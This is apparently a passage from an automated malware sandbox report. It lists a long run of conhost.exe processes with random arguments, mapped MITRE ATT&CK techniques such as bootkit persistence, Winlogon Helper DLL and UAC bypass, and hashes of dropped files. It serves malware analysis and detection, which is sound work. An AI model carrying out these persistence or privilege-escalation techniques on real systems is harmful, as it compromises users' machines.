C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-137757887-2050928685-193987438-21198619938663582785240919491259895822-1405341401"1⤵PID:2464
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1582131915-1818442508345966894405292231-965675916-1306464604-1358459872-44459498"1⤵PID:380
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1798329338-412655061-1789956836-20815899961324467237-438090289-984704158-1466973907"1⤵PID:2824
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1384728197-782569420-1993577204-1328441073345696650-1464539075371820741326197602"1⤵PID:1488
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1214900420-452387530-11941999901158575697-1538806498-820565254-17228258001313359688"1⤵PID:2076
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-738759891-169272849-12220861111889045868182299802103036214-1128965893-2133076818"1⤵PID:3248
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "909442621611109525-18363644442061430844-1703659490-21187344381522763982507322104"1⤵PID:3460
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1171447329-1550907193-1142626495-45893687316679545081609237795857084959-158731582"1⤵PID:3492
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1511126505-57948661-2121121221-1685339390-357417678-705356418-97221525-564529714"1⤵PID:2580
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "12335844677926123231623818862-1210951843-1430338803-326344980-273474033183630140"1⤵PID:1004
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "912181822-635074711-1791628637-174953248212170523841414846830828055649-47828480"1⤵PID:3908
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-9083195921674414138625466066-11536012182275338281101342393-364201837-1487883231"1⤵PID:3288
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "6262467071981080528-1710126922483141467-18320258611537763204114712572-2135070936"1⤵PID:1052
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-8830745741128541469947272867817346731703568792853994779-1036088981303627429"1⤵PID:1516
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1847074793-100451235-599949181-847067753-1100701012768583410-14116908911596100789"1⤵PID:3736
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "79985939081526473503366797690443411815582440-1310187774589433001-701673817"1⤵PID:3600
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "19467059371834272716-499791449-20701899416360086008026456651472278311-851961786"1⤵PID:3996
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2122788361728764020628613667-131468001110783859975834662945942944031109612079"1⤵PID:4068
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2110594314-66729367899563309321225789271018018137-11225088591368696231605207980"1⤵PID:3448
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "343668591043237973-1345592523-819772282-186996909476017302-574494909-1854474076"1⤵PID:4048
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "7622787231076324505-961219213153677226710162594931765731719-633592419-581249756"1⤵PID:2596
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "176302930045025510950355524416160479211771133419-744891285812383129887332056"1⤵PID:3784
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-169368444917609499241822192359870360578-11255443691343591135329150358-214181262"1⤵PID:3760
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2083406644-458252017-18109127521619987457-1850783277334125821291293891407213967"1⤵PID:4320
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1792147420114453575-774491207-1718244553-21129321871958232276-20383139511088840636"1⤵PID:4924
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "14141827161144511199216336081-1620129348105240240415728709031089094628-1809725220"1⤵PID:4436
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2354215381865823453-1244352468-1769240951965668692299531523645479703-1318357360"1⤵PID:5060
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1939424173-168191625012758793563910675766062758893989050482044828546-502326009"1⤵PID:3752
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1073366037-50025725519140407777061917002008316185136993642357581868-63714414"1⤵PID:4868
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-898134462-20183623676635918-1036682329-1058665174-123364791-443841215-519531165"1⤵PID:4236
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-169972305613419550011619440335-356624949362210721-6289303329923361602134556258"1⤵PID:5408
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "620461132-123426941-1962000978100470382739756888-800552722-18831081841347159523"1⤵PID:5992
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "18464894961532086107-10781256931693970440-1511652894534463130-11958893231369018071"1⤵PID:4624
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2118435253470978354-20081491951727838961370813369-111788706175611160-2122573909"1⤵PID:5976
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2093618180-34186218916457965602021462804-18472826642848317552096112729-1186846217"1⤵PID:5940
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-20333551891001056542840815792-19469999691057130786-8524922081803101268443354641"1⤵PID:4112
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1196916639724021235-1103036701822276615222813484-1054341173-9578017631409481701"1⤵PID:5316
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "20279316601214512637379116672-2112459730-1459444142-676821496-13539574311087169992"1⤵PID:5268
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-36419231531891834161490150417601481821210273006-451914781-4150815481147947242"1⤵PID:5524
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "21325274891690799625-411762690-210458370144587626-1287372400-894139989-773496203"1⤵PID:5604
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "477630112303842847-1538966470-2321699561507441143375011481-272179162861774097"1⤵PID:6064
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-89761958017178179411303792914052658301194957496-744994024-582986565-491657284"1⤵PID:4460
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-3430514931322808691-219821169-171481091121267239641288379812192196806-1126358956"1⤵PID:6088
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1810580017-1318082151-846321335-537303132-1739101191366048271-1727058649-111601746"1⤵PID:6320
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1625138446-5715141801621539351-1780038514109099997716152097851121320139-763580898"1⤵PID:6896
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1218423955-608181404-1800546392-743557101-6093101861417298479-6596790571616924845"1⤵PID:7036
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-109457793113897049151164471431363502228-200743819816811799701919143210-2097874320"1⤵PID:5296
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1259855074-1977245523445304510421788527-1319203107-70223348-412296947-1672291520"1⤵PID:6656
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-5011441411538511296-253857375-1144637001-1801877649-133371606-1111799872690809377"1⤵PID:6920
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-18238221211964626545-338877014904311416788685891591179566118515548926652419"1⤵PID:5192
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "358339041484075351389181171-710513929217506289-1645797217-12983784361456269411"1⤵PID:7100
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1676233521650095527-209488350-20796147191314991021121089822-1936053828-382493566"1⤵PID:7080
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1962448231-1997928778165795822-1713653724-6492329517419397102119465381-782539627"1⤵PID:7404
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "60305341856596105-1218882355626985905396170726-1046832195-475847905653480907"1⤵PID:7936
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "644261067-156735115921421796631022974113-1803620011258711272392910789648484019"1⤵PID:8144
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-294590014901780365-178235231-1400509292109430596019378631522066116248297984904"1⤵PID:7240
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1200744732-1536618827160294134-816768690-13835457391037646315943764398-771462098"1⤵PID:7292
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Winlogon Helper DLL
2Event Triggered Execution
1Change Default File Association
1Pre-OS Boot
1Bootkit
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Winlogon Helper DLL
2Event Triggered Execution
1Change Default File Association
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\₧¤ß¾╔63ö◄•ř²¾▼åßóΣ╧╩↑å♪ř╩♂╚ě±2♫™♀š¶œÂ♪☼¤☻4↑Ç6¼í×™æ◙¢2◙╩¶½4žě♠♦µ¼☺č∞í☺♠↕ÿ₧õřπïě¬ñßŸě¢±╩5◙φ™²♦ε¥1—¤σŸí
Filesize666B
MD59e1e5883c74742a497cf5c272ccd2321
SHA12cf33e34d08b8e17743a60352baffef4b6f02dee
SHA256ca687b6a7c3d29b566f3e1988b9f877b51d9a83ee25ffe0755a8dcd3eb5f434a
SHA512f2284f0c624cc07a65c16f87865bb98aaa176b1d8b45cd4fbcc1143c9c2297fe6b1d4db55ef054be2bc151c8cc25ff4da7c997b7d38dae3dccd2ffe1c3c01a6b
-
Filesize
103KB
MD5373d53d7c6709d5106b29a26a71b0d31
SHA11708009c111266ba513503e06b94a5ccd402dee5
SHA256de3f42bc53000d3dad58f3182108c414ce8062095ef390314fcc628473490c86
SHA51215b32cd9b87a9852d6ad0f03321edb15468e136a220ff4473bc109355c9b401a4c4f7eeb99ad7097c67f9cfac7c416f84038c0639e4db59561d2dbc74ef5d67d
-
Filesize
418KB
MD5f5007f18070e9cfc0b23c5ebb25c4468
SHA1cf430806009fe87580705a85474a8604c84292fe
SHA25618f27d42b09fe462af83c3ec3e82842e09a7db2e9c69cb6044e977b7af87a3c9
SHA5127b9de630ea04314813895e2dc8908429bc393f2a7c0dd50ed1ac7802f8ba3d36998886bd9da3dd7c857a992dd9aecf016eb55a0cb33a3b234fa1e3137f094c50